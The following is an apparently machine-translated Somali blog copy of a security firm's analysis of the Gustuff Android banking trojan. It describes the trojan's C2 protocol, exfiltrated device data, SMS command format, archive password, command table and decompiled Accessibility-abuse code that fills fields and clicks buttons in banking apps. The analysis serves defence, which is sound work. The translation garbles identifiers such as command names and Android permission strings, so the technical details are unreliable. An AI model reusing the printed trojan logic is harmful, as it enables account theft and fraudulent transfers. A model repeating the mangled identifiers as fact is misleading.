ProHoster > Блог > wararka internetka > Sida Android Trojan Gustuff uu uga saaro kiriimka (fiat iyo crypto) akoonnadaada

Sida Android Trojan Gustuff uu uga saaro kiriimka (fiat iyo crypto) akoonnadaada

Sida Android Trojan Gustuff uu uga saaro kiriimka (fiat iyo crypto) akoonnadaada

Kaliya maalinta kale Group-IB lagu wargeliyay ku saabsan hawsha mobilka Android Trojan Gustuff. Waxay si gaar ah uga shaqeysaa suuqyada caalamiga ah, iyadoo weerareysa macaamiisha 100 ka bangiyada shisheeye ee ugu weyn, isticmaaleyaasha mobilada 32 crypto boorsooyinka, iyo sidoo kale ilaha ganacsiga e-commerce ee waaweyn. Laakin horumariyaha Gustuff waa dambiilaha internetka ee Ruushka ku hadla ee hoos yimaada naaneysta Bestoffer. Ilaa dhowaan, wuxuu ku ammaanay Trojan-kiisa inuu yahay "wax soo saar halis ah oo loogu talagalay dadka aqoonta iyo khibradda leh."

Khabiirka falanqaynta koodhka xaasidnimada leh ee Kooxda-IB Ivan Pisarev cilmi baaristiisa, wuxuu si faahfaahsan uga hadlayaa sida Gustuff u shaqeeyo iyo waxa khatarteeda leh.

yuu Gustuff ugaadhsanayaa?

Gustuff waxa iska leh jiil cusub oo malware ah oo leh hawlo toos ah. Sida laga soo xigtay horumariyaha, Trojan-ku wuxuu noqday nooc cusub oo la wanaajiyey oo ah AndyBot malware, kaas oo tan iyo bishii Nofembar 2017 uu weerarayay taleefannada Android oo uu lacag ku xaday foomamka shabakadda internetka ee phishing-ka oo isu ekeysiiyay codsiyada mobilada ee bangiyada caalamiga ah ee caanka ah iyo nidaamyada lacag-bixinta. Bestoffer ayaa sheegtay in qiimaha kirada Gustuff Bot uu ahaa $800 bishii.

Falanqaynta muunada Gustuff waxay muujisay in Trojan ay suurtogal tahay inay bartilmaameedsato macaamiisha isticmaalaya codsiyada moobiilka ee bangiyada ugu waaweyn, sida Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, iyo sidoo kale crypto boorsooyinka crypto. Bitcoin Wallet, BitPay, Cryptopay, Coinbase, iwm.

Asal ahaan waxa loo abuuray sidii Trojan bangi oo caadi ah, nooca hadda ah Gustuff waxa uu si weyn u balaadhiyey liiska bartilmaameedyada suurtagalka ah ee weerarka. Marka lagu daro codsiyada Android ee bangiyada, shirkadaha fintech iyo adeegyada crypto, Gustuff waxaa loogu talagalay dadka isticmaala codsiyada suuqa, dukaamada online-ka ah, nidaamyada lacag-bixinta iyo fariimaha degdega ah. Gaar ahaan, PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut iyo kuwa kale.

Barta gelitaanka: xisaabinta infekshanka tirada badan

Gustuff waxaa lagu gartaa habka "caadiga ah" ee dhex galka taleefannada casriga ah ee Android iyada oo loo marayo fariimaha SMS-ka ee xiriirinta APKs. Marka aaladda Android uu ku dhaco Trojan amarka serferka, Gustuff waxa laga yaabaa in uu ku sii faafo xogta xidhiidhka ee taleefanka cudurka qaba ama kaydka kaydka serverka. Shaqada Gustuff waxaa loogu talagalay infekshanka ballaaran iyo ganacsiga ugu badan ee ganacsigeeda - waxay leedahay shaqo "auto-buux" u gaar ah codsiyada bangiyada moobiilka ee sharciga ah iyo boorsada crypto, taas oo kuu ogolaaneysa inaad dedejiso oo aad qiyaasto xatooyada lacagta.

Daraasad lagu sameeyay Trojan-ka ayaa muujisay in shaqada autofill lagu hirgeliyay iyada oo la adeegsanayo Adeegga Helitaanka, adeegga dadka naafada ah. Gustuff maaha Trojan-kii ugu horreeyay ee si guul leh uga gudubta ilaalinta is-dhexgalka walxaha daaqadaha ee codsiyada kale ee isticmaalaya adeeggan Android. Si kastaba ha ahaatee, isticmaalka Adeegga Helitaanka marka lagu daro buuxinta baabuurka weli waa dhif.

Ka dib markii la soo dejiyo taleefanka dhibbanaha, Gustuff, adoo adeegsanaya Adeegga Helitaanka, wuxuu awood u leeyahay inuu la falgalo walxaha daaqadaha ee codsiyada kale (bangiga, cryptocurrency, iyo sidoo kale codsiyada dukaameysiga khadka tooska ah, fariimaha, iwm.), fulinta falalka lagama maarmaanka u ah weeraryahannada . Tusaale ahaan, amarka server-ka, Trojan wuxuu riixi karaa badhamada wuxuuna bedeli karaa qiyamka goobaha qoraalka ee codsiyada bangiyada. Isticmaalka habka Adeegga Helitaanka ayaa u oggolaanaya Trojan-ka inuu dhaafo hababka amniga ee bangiyada ay adeegsadaan si ay uga hortagaan jiilkii hore ee Trojans-ka mobilada, iyo sidoo kale isbeddelada siyaasada amniga ee Google ay ku hirgalisay noocyo cusub oo Android OS ah. Markaa, Gustuff "waa ogyahay sida" loo joojiyo ilaalinta ilaalinta Google: sida uu qabo qoraaga, shaqadani waxay ka shaqeysaa 70% kiisaska.

Sida Android Trojan Gustuff uu uga saaro kiriimka (fiat iyo crypto) akoonnadaada

Gustuff waxa kale oo uu soo bandhigi karaa ogaysiisyada PUSH been abuur ah oo wata astaanta codsiyada mobilada ee sharciga ah. Isticmaaluhu wuxuu gujiyaa ogeysiiska PUSH wuxuuna arkayaa daaqada phishing-ka ah ee laga soo dejiyay server-ka, halkaas oo uu galo kaarka bangiga ee la codsaday ama xogta jeebka crypto. Xaalad kale oo Gustuff, codsiga magaca ogaysiinta PUSH ee la soo bandhigay waa la furay. Xaaladdan oo kale, malware-ka, marka uu amar ka helo server-ka iyada oo loo marayo Adeegga Helitaanka, wuxuu buuxin karaa foomamka foomka codsiga bangiyada ee macaamil ganacsi been abuur ah.

Hawlaha Gustuff sidoo kale waxaa ka mid ah u dirida macluumaadka ku saabsan aaladda cudurka qaba ee server-ka, awooda akhrinta/diridda fariimaha SMS-ka, dirida codsiyada USSD, bilaabida SOCKS5 Proxy, raacitaanka isku xirka, dirida faylalka (oo ay ku jiraan sawiro sawiro dukumeenti ah, sawiro, sawiro) server , dib u habayn qalabka si aad u habayn warshad.

Falanqaynta Malware

Kahor intaadan rakibin codsi xaasidnimo ah, Android OS wuxuu tusayaa isticmaalaha daaqad ay ku jirto liiska xuquuqaha uu codsaday Gustuff:

Sida Android Trojan Gustuff uu uga saaro kiriimka (fiat iyo crypto) akoonnadaada
Codsiga waxaa la rakibi doonaa kaliya ka dib marka la helo ogolaanshaha isticmaalaha. Ka dib markii la bilaabay codsiga, Trojan wuxuu tusi doonaa isticmaalaha daaqad:

Sida Android Trojan Gustuff uu uga saaro kiriimka (fiat iyo crypto) akoonnadaada
Taas ka dib waxay ka saari doontaa icon ay.

Gustuff waxaa ka buuxa, sida uu qabo qoraaga, baakad ka socota FTT. Bilawga ka dib, arjigu wuxuu si xilliyo ah ula xiriiraa server-ka CnC si uu u helo amarro. Dhawr fayl oo aanu baadhnay ayaa u isticmaalnay ciwaanka IP-ga sidii server-ka kantaroolka 88.99.171[.]105 (Hadda ka dib waxaan u tilmaami doonaa sida <%CnC%>).

Ka dib markii la bilaabay, barnaamijku wuxuu bilaabay inuu u diro farriimaha server-ka http://<%CnC%>/api/v1/get.php.

Jawaabta waxaa la filayaa inay noqoto JSON qaabkan soo socda:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

Mar kasta oo arjiga la galo, waxay soo dirtaa macluumaadka ku saabsan aaladda cudurka qabta. Qaabka fariinta ayaa lagu muujiyay hoos. Waxaa xusid mudan in beeraha buuxa, dheeraad ah, apps и fasax - Ikhtiyaar ah waxaana loo diri doonaa kaliya haddii ay dhacdo amar codsi ka yimid CnC.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
}

Kaydinta xogta qaabeynta

Gustuff waxa ay ku kaydisaa xogta hawlgelinta muhiimka ah ee faylka la door bidayo. Magaca faylka, iyo sidoo kale magacyada halbeegyada ku jira, waa natiijada xisaabinta wadarta MD5 ee xargaha 15413090667214.6.1<%name%>halkaas oo <%name%> - magaca hore-qiimaha. Fasiraadda Python ee shaqada jiilka: 

 nameGenerator(input):
    output = md5("15413090667214.6.1" + input)

Waxa soo socda waxaan u tilmaami doonaa sida Generator (ku-dar).
Markaa magaca faylka koowaad waa: Magaca Generator("API_SERVER_LIST"), waxa ay ka kooban tahay qiyam leh magacyada soo socda:

Magac kala duwan qiimaha
Magaca Generator("API_SERVER_LIST") Ka kooban liiska ciwaannada CnC oo qaab habaysan ah.
Generator ("API_SERVER_URL") Waxa ku jira ciwaanka CnC
Generator ("SMS_UPLOAD") Calanku waxa loo dejiyay si aan caadi ahayn. Haddii calanka la dejiyay, wuxuu u soo diraa fariimo SMS CnC.
Magaca Generator("SMS_ROOT_NUMBER") Nambarka taleefanka ee fariimaha SMS-ka ee laga helo aaladda cudurka ayaa loo diri doonaa. Asal ahaan waa waxba.
Magaca Generator("SMS_ROOT_NUMBER_RESEND") Calanku si caadi ah ayaa loo nadiifiyay Haddii la rakibo, marka qalab cudurka qaba helo SMS, waxaa loo diri doonaa lambarka xididka.
Generator ("DEFAULT_APP_SMS") Calanku si caadi ah ayaa loo nadiifiyay Haddii calankan la dejiyay, codsigu waxa uu farsamayn doonaa fariimaha SMS-ka ee soo socda.
Generator ("DEFAULT_ADMIN") Calanku si caadi ah ayaa loo nadiifiyay Haddii calanka la dhigay, codsigu wuxuu leeyahay xuquuqaha maamulaha.
Generator ("DEFAULT_ACCESSIBILITY") Calanku si caadi ah ayaa loo nadiifiyay Haddii calanka la dhigay, adeeg isticmaalaya Adeegga Helitaanka ayaa socda.
Generator ("APPS_CONFIG") Shayga JSON oo ka kooban liiska falalka ay tahay in la sameeyo marka ay dhacdo galitaanka ee la xidhiidha codsi gaar ah la kiciyo.
Generator ("APPS_INSTALLED") Waxay kaydisaa liiska codsiyada lagu rakibay qalabka.
Generator ("IS_FIST_RUN") Calanka ayaa dib loo dajiyay bilowga hore.
Generator ("UNIQUE_ID") Waxa ku jira tilmaame gaar ah. La sameeyay markii bot-ka la bilaabay markii ugu horreysay.

Module ka habaynta amarada seerfarka

Codsigu wuxuu kaydiyaa ciwaannada CnC server-yada oo ah qaab habaysan oo lagu koodka Salka85 khadadka. Liiska server-yada CnC waa la bedeli karaa marka la helo amarka ku habboon, markaas oo cinwaannada lagu kaydin doono faylka doorbidida.

Iyadoo laga jawaabayo codsiga, adeeguhu wuxuu u soo dirayaa amar codsiga. Waxaa xusid mudan in amarrada iyo cabbiraadaha lagu soo bandhigay qaabka JSON. Codsigu wuxuu socodsiin karaa amarrada soo socda:

kooxda Description
HordhacStart Bilow u dirida fariimaha SMS-ka ee uu helay aaladda cudurka qabta serfarka CnC.
Joogsi hore Jooji diritaanka fariimaha SMS-ka ee uu helay aaladda cudurka qabta ee serfarka CnC.
ussdRun Fulinta codsiga USSD Lambarka aad u baahan tahay inaad u samayso codsiga USSD wuxuu ku yaalaa goobta JSON "lambarka".
dir SMS Soo dir hal fariin SMS ah (haddii loo baahdo, fariintu waxay "kala qaybsantaa" qaybo). Halbeeg ahaan, amarku waxa uu qaadaa shay JSON ka kooban yahay beeraha "to" - lambarka goobta iyo "jirka" - jidhka fariinta.
dirSmsAb U dir farriimaha SMS-ka (haddii loo baahdo, farriintu waxay "la qaybsan tahay" qaybo) qof kasta oo ku jira liiska xiriirka aaladaha cudurka qaba. Inta u dhaxaysa diritaanka fariimaha waa 10 ilbiriqsi. Jidhka fariintu waxa uu ku yaalaa goobta JSON "jidhka"
dir SMSMass U dir farriimaha SMS-ka (haddii loo baahdo, farriintu waxay "la qaybsan tahay" qaybo) xiriirada lagu qeexay xuduudaha amarka. Inta u dhaxaysa diritaanka fariimaha waa 10 ilbiriqsi. Halbeeg ahaan, amarku wuxuu qaadaa array JSON ah ("sms" goobta), walxaha ay ka kooban yihiin meelaha "to" - lambarka goobta iyo "jirka" - jirka fariinta.
beddelka adeegaha Amarkani wuxuu qaadan karaa qiime leh furaha "url" sida halbeeg ahaan - ka dib botku wuxuu bedeli doonaa qiimaha magaca Generator ("SERVER_URL"), ama "array" - ka dib botku wuxuu u qori doonaa array si loogu magacaabo Generator ("API_SERVER_LIST") Markaa, codsigu wuxuu beddelaa ciwaanka server-yada CnC.
admin Number Amarka waxaa loogu talagalay inuu ku shaqeeyo lambarka xididka. Amarku waxa uu aqbalaa shayga JSON ee leh xuduudaha soo socda: "nambar" - u beddel magaca Generator("ROOT_NUMBER") oo u beddelo qiimaha la helay, "dib u dir" Aqoonsiga gaarka ah.
updateInfo U dir macluumaadka ku saabsan aaladda cudurka qabta seerfarka.
tirtirData Amarka waxaa loogu talagalay in lagu tirtiro xogta isticmaalaha. Iyada oo ku xidhan magaca codsiga la bilaabay, ama xogta gabi ahaanba waa lagu tirtiraa dib-u-kicinta aaladda ( isticmaalaha aasaasiga ah), ama kaliya xogta isticmaalaha waa la tirtiraa (isticmaal sare).
socksStart Bilow moduleka wakiilnimada. Hawlgalka moduleka waxaa lagu qeexay qayb gaar ah.
sharabaad joogsi Jooji moduleka wakiilnimada.
isku xidhka furan Raac xiriirka Xidhiidhku wuxuu ku yaalaa halbeegga JSON ee hoos yimaada furaha "url". "android.intent.action.VIEW" waxa loo isticmaalaa in lagu furo xidhiidhka.
soo geliAllSms U dir dhammaan fariimaha SMS-ka ee uu qalabku helay serfarka
soo rar AllPhotos Ka soo dir sawirada qalab cudurka qaba URL. URL-ku wuxuu u yimaadaa sidii halbeeg ahaan.
uploadFayl U soo dir fayl URL qalab cudurka qaba. URL-ku wuxuu u yimaadaa sidii halbeeg ahaan.
soo geli nambarada Telefoonka U dir lambarada taleefanka liiskaaga xiriirka serverka. Haddii qiimaha shayga JSON ee leh furaha "ab" loo helo halbeeg ahaan, codsigu wuxuu ka helayaa liiska xiriirada buugga taleefanka. Haddii shay JSON oo leh furaha "sms" loo helo halbeeg ahaan, codsigu wuxuu akhriyaa liiska xiriirada dirayaasha fariimaha SMS-ka.
beddel kayd Codsigu wuxuu ka soo dejinayaa faylka ciwaanka u imanaya sida cabbirka isagoo isticmaalaya furaha "url". Faylka la soo dejiyay waxaa lagu keydiyay magaca "archive.zip". Codsiga ayaa markaa furaya faylka, iyada oo si ikhtiyaari ah u adeegsan doonta erayga sirta ah ee kaydka "b5jXh37gxgHBrZhQ4j3D". Faylasha la furay waxa lagu kaydiyay [xaraynta dibadda]/hgps directory. Buug-gacmeedkan, arjigu waxa uu kaydiyaa been-abuurka shabakadda (hoos lagu sharraxay).
tallaabooyinka Amarka waxaa loogu talagalay inuu la shaqeeyo Action Service, kaas oo lagu qeexay qayb gaar ah.
imtixaanka Waxba ma qabanayso.
download Amarka waxaa loogu talagalay in lagu soo dejiyo faylka server-ka fog oo lagu keydiyo buugga "Downloads". URL iyo magaca faylka waxay u yimaadaan halbeeg ahaan, meelaha ku jira shayga halbeegga JSON, siday u kala horreeyaan: "url" iyo "fileName".
ka saar Ka saartaa faylka tusaha "Downloads". Magaca faylku wuxuu ku yimaadaa halbeeg JSON ah oo wata furaha "fileName". Magaca faylka caadiga ah waa "tmp.apk".
ogeysiinta Tus ogeysiis wata sharraxaad iyo qoraalo cinwaan oo uu qeexay server-ka maamulka.

Qaabka taliska ogeysiinta:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

Ogeysiinta uu keenay faylka la baarayo waxay u egtahay mid la mid ah ogeysiisyada uu dhaliyay arjiga lagu cayimay goobta app. Haddii goobta qiimaha FurApp - Run, marka ogeysiis la furo, codsiga lagu qeexay goobta ayaa la bilaabayaa app. Haddii goobta qiimaha FurApp - Been, haddaba:

  • Daaqad phishing ah ayaa furmay, waxa ku jira kuwaas oo laga soo dejiyay buugga hagaha <% kaydinta dibadda%>/hgps/<% filename%>
  • Daaqad phishing ah ayaa furmay, oo waxa ku jira laga soo dejiyo server-ka <%url%>?id=<%Bot id%>&app=<%Codsiga Magaca%>
  • Daaqad phishing ah ayaa furmay, oo loo ekaysiinayo Google Play Card, oo leh fursad lagu galo faahfaahinta kaadhka.

Codsigu wuxuu u diraa natiijada amar kasta <%CnC%>set_state.php sida shayga JSON ee qaabkan soo socda: 

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

Adeegga Actions
Liistada amarrada ay hababka codsigu ku jiraan tallaabo. Marka amarka la helo, qaybta habaynta amarka ayaa gelaysa adeegan si uu u fuliyo amarka la dheereeyey. Adeeggu wuxuu u aqbalaa shay JSON cabbir ahaan. Adeeggu wuxuu fulin karaa amarrada soo socda:

1. PARAMS_ACTION - marka la helayo amarkan, adeeggu wuxuu marka hore ka helayaa halbeegga JSON qiimaha furaha Nooca, kaas oo noqon kara sidan soo socota:

  • Adeegga Macluumaadka – Talis-hoosaadku waxa uu qiimaha furaha ka helayaa halbeegga JSON Muhiim ma aha. Haddii calanku run yahay, codsigu wuxuu dejinayaa calanka FLAG_ISOLATED_PROCESS adeeg isticmaalaya Adeegga Helitaanka. Sidan ayaa adeegga lagu bilaabayaa hab gaar ah.
  • xidid - hel oo u soo dir server-ka macluumaadka ku saabsan daaqadda hadda diiradda la saaray. Codsigu wuxuu ku helaa macluumaadka isagoo isticmaalaya fasalka AccessibilityNodeInfo.
  • admin - codso xuquuqda maamulaha.
  • daahitaan - hakinta Adeegga Actions ee tirada millise seconds ee lagu cayimay halbeegga furaha "xogta".
  • daaqadaha - u dir liiska daaqadaha u muuqda isticmaalaha.
  • rakibi - ku rakib codsiga qalabka cudurka qaba. Magaca xirmada kaydka ayaa ku jira furaha "fileName". Kaydka laftiisa waxa uu ku yaalaa tusaha soo dejinta.
  • caalamka - amar-hoosaadka waxaa loogu talagalay inuu ka socdo daaqadda hadda:
    • on the Quick Settings menu
    • dambe
    • guriga
    • ogeysiisyada
    • daaqada codsiyada dhawaan la furay

  • furitaanka - billow codsiga. Magaca codsigu wuxuu u yimaadaa halbeeg ahaan fure ahaan data.
  • codadka - habka codka u beddel aamusnaanta.
  • furid - waxay u shidaysaa iftiinka dambe ee shaashadda iyo kiiboodhka si ay u dhalaal buuxa. Codsigu waxa uu ku fuliyaa ficilkan isagoo isticmaalaya WakeLock, isaga oo tilmaamaya xadhigga [Codsiga qoraalka]:INFO calaamad ahaan
  • ogolaanshaha dulsaar - shaqada lama hirgelin (jawaabta fulinta amarka waa {"farriin":"Ma taageeri"} ama {"farriin":"low sdk")
  • dhaqdhaqaaqa - shaqada lama hirgelin (jawaabta fulinta amarka waa {"farriin":"Ma taageero"} ama {"fariinta":" API hoose"})
  • rukhsadda - amarkani waa lagama maarmaan si loo codsado ogolaanshaha codsiga. Si kastaba ha ahaatee, shaqada waydiinta lama hirgeliyo, markaa amarku waa macno darro. Liistada xuquuqaha la codsado waxa ay u timaadaa qaab JSON ah oo wata furaha "ogolaanshaha". Liiska caadiga ah:
    • ogolaanshaha android.READ_PHONE_STATE
    • android.ogolaansho.READ_CONTACTS
    • android.ogolaansho.CALL_PHONE
    • android.ogolaansho.QAAB_SMS
    • android.ogolaansho.SEND_SMS
    • android.ogolaansho.AKHRISO_SMS
    • android.ogolaansho.READ_EXTERNAL_STORAGE
    • android.permission.WRITE_EXTERNAL_STORAGE

  • furan - soo bandhig daaqad phishing ah. Iyada oo ku xidhan cabbirka ka imanaya server-ka, codsigu waxa uu soo bandhigi karaa daaqadaha phishing-ka ee soo socda:
    • Tus daaqada phishing-ka oo nuxurkiisu ay ku qoran yihiin fayl ku jira hagaha <% tusaha dibadda%>/hgps/<%param_filename%>. Natiijada isdhexgalka isticmaalaha ee daaqada ayaa loo diri doonaa <%CnC%>/records.php
    • Tus daaqad phishing ah oo waxa ku jira horay looga soo raray ciwaanka <%url_param%>?id=<%bot_id%>&app=<%packagename%>. Natiijada isdhexgalka isticmaalaha ee daaqada ayaa loo diri doonaa <%CnC%>/records.php
    • Tus daaqada phishing-ka oo loo ekeysiiyay Google Play Card

  • interactive - Amarka waxaa loogu talagalay inuu la falgalo walxaha daaqadaha ee codsiyada kale iyadoo la adeegsanayo Adeegga Acessibility. Adeeg gaar ah ayaa laga hirgaliyay barnaamijka isdhexgalka. Codsiga la baarayo wuxuu la falgali karaa daaqadaha:
    • Hadda firfircoon Xaaladdan oo kale, halbeeggu wuxuu ka kooban yahay id ama qoraalka (magaca) shayga aad u baahan tahay inaad la falgasho.
    • U muuqda isticmaaluhu wakhtiga amarka la fulinayo. Codsigu wuxuu ku doortaa daaqadaha id.

    Isagoo helay walxo HelitaankaNodeInfo Walxaha daaqada ee xiisaha leh, codsiga, iyada oo ku xidhan xuduudaha, waxay samayn kartaa falalka soo socda:

    • diiradda - u deji diiradda shayga.
    • guji - ku dhufo shay.
    • actionId - samee ficil aqoonsi.
    • setText - beddel qoraalka shay. Beddelka qoraalka laba siyaabood ayay u suurtowdaa: samee fal ACTION_SET_TEXT (haddii nooca Android ee aaladda cudurka qabta uu ka yar yahay ama la mid yahay LOLLIPOP), ama adigoo xadhig saaraya sabuuradda oo ku dhejiya shay (noocyadii hore). Amarka waxaa loo isticmaali karaa in lagu beddelo xogta ku jirta codsiga bangiga.

2. PARAMS_ACTIONS - la mid ah PARAMS_ACTION, kaliya amarrada JSON ayaa imanaya.

Waxay u muuqataa in dad badani ay xiiseyn doonaan sida ay u egtahay shaqada la falgalka walxaha daaqada ee codsi kale. Tani waa sida shaqadan looga hirgaliyay Gustuff:

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int count = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= count) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == count) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));
}

Shaqada beddelka qoraalka:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
        ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
        result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

Sidaa darteed, qaabka saxda ah ee server-ka kantaroolka, Gustuff wuxuu awood u leeyahay inuu buuxiyo meelaha qoraalka ee codsiga bangiyada oo guji badhamada lagama maarmaanka u ah si loo dhamaystiro macaamilka. Trojan-ku xitaa uma baahna inuu galo arjiga-waa ku filan inaad dirto amar si ay u muujiso ogaysiinta PUSH ka dibna fur codsiga bangiyada hore loo rakibay. Isticmaaluhu wuxuu xaqiijin doonaa naftiisa, ka dib Gustuff wuxuu awoodi doonaa inuu buuxiyo baabuurka.

Qaabka habaynta fariinta SMS

Codsigu wuxuu u rakibaa maamule dhacdo aaladda cudurka qaba si uu u aqbalo fariimaha SMS-ka. Codsiga hoos yimaada wuxuu heli karaa amarro ka socda hawlwadeenka, kaas oo ku yimaada jidhka fariinta SMS-ka. Awaamiirta waxay ku yimaadaan qaabka:

7!5=<%Base64 codeed%>

Codsigu wuxuu ka raadiyaa xadhigga dhammaan fariimaha SMS-ka ee imanaya 7!5=, marka xadhig la ogaado, waxay ka go'do xadhigga Base64 at offset 4 oo fuliyo amarka. Amaradu waxay la mid yihiin kuwa leh CnC. Natiijada fulinta waxaa loo diraa isla lambarka uu talisku ka yimid. Qaabka jawaabta:

7*5=<%Base64 encode of "result_code order"%>

Ikhtiyaar ahaan, codsigu wuxuu soo diri karaa dhammaan fariimaha la helay lambarka xididka. Si tan loo sameeyo, lambarka xididka waa in lagu qeexaa faylka doorbidida iyo calanka fariinta wareejinta waa in la dejiyaa. Farriin SMS ah ayaa loo diraa nambarka qofka weerarka geystay qaab:

<% laga bilaabo nambar%> - <%Waqti, qaab: dd/MM/yyyy HH:mm:ss%> <% SMS body%>

Sidoo kale, ikhtiyaari, codsigu wuxuu u diri karaa farriimaha CnC. Fariinta SMS-ka waxa loo diraa serfarka qaab JSON ah: 

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

Haddii calanka la dhigo Generator ("DEFAULT_APP_SMS") - Codsiga wuxuu joojiyaa socodsiinta fariinta SMS wuxuuna nadiifiyaa liiska fariimaha soo socda.

Module wakiil

Codsiga lagu jiro daraasadda waxaa ku jira moduleka 'Backconnect Proxy' (oo hadda loo yaqaan moduleka wakiil), kaas oo leh fasal gooni ah oo ay ku jiraan goobo taagan oo leh qaabayn. Xogta habaynta waxa lagu kaydiyaa muunada si cad:

Sida Android Trojan Gustuff uu uga saaro kiriimka (fiat iyo crypto) akoonnadaada

Dhammaan ficillada uu sameeyo moduleka wakiillada waxaa la galiyay faylasha. Si tan loo sameeyo, codsiga ku jira Kaydinta Dibadda wuxuu abuuraa tusaha loo yaqaan "logs" (goobta ProxyConfigClass.logsDir ee fasalka qaabeynta), kaas oo faylasha log lagu kaydiyo. Gelintu waxay ku dhacdaa faylasha leh magacyo:

  1. ugu weyn.txt - shaqada fasalka loo yaqaan CommandServer ayaa la galiyay faylkan. Waxa soo socda, gelida xadhigga str ee faylkan waxa loo tilmaami doonaa mainLog(str).
  2. fadhi-<%id%>.txt - Faylkan waxa uu kaydiyaa xogta log ee la xidhiidha fadhi wakiil gaar ah. Waxa soo socda, gelida xadhigga str ee faylkan waxa loo tilmaamayaa sessionLog (str).
  3. server.txt - faylkan waxaa loo isticmaalaa in lagu qoro dhammaan xogta ku qoran faylalka kor ku xusan.

Habka xogta gal:

<%Date%> [Thread[<%thread id%>], id[]]: log-string

Waxyaabaha ka reeban ee dhaca inta lagu jiro hawlgalka moduleka wakiillada ayaa sidoo kale la galiyay fayl. Si tan loo sameeyo, arjigu wuxuu soo saaraa shay JSON qaabkan soo socda: 

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

Kadibna waxay u beddeshaa matalida xargaha oo ay qorto.

Qaybta wakiillada waxa la bilaabay ka dib markii la helo amarka u dhigma. Marka amar lagu soo bandhigo moduleka wakiillada la helo, codsigu wuxuu bilaabaa adeeg la yiraahdo Adeegga Guud, kaas oo mas'uul ka ah maaraynta hawlgalka moduleka wakiil - bilaabista iyo joojinta.

Heerarka bilowga adeegga:

1. Wuxuu bilaabaa saacada ordaya hal mar oo hubiya hawsha moduleka wakiillada. Haddii moduleku aanu firfircoonayn, wuu bilaabaa.
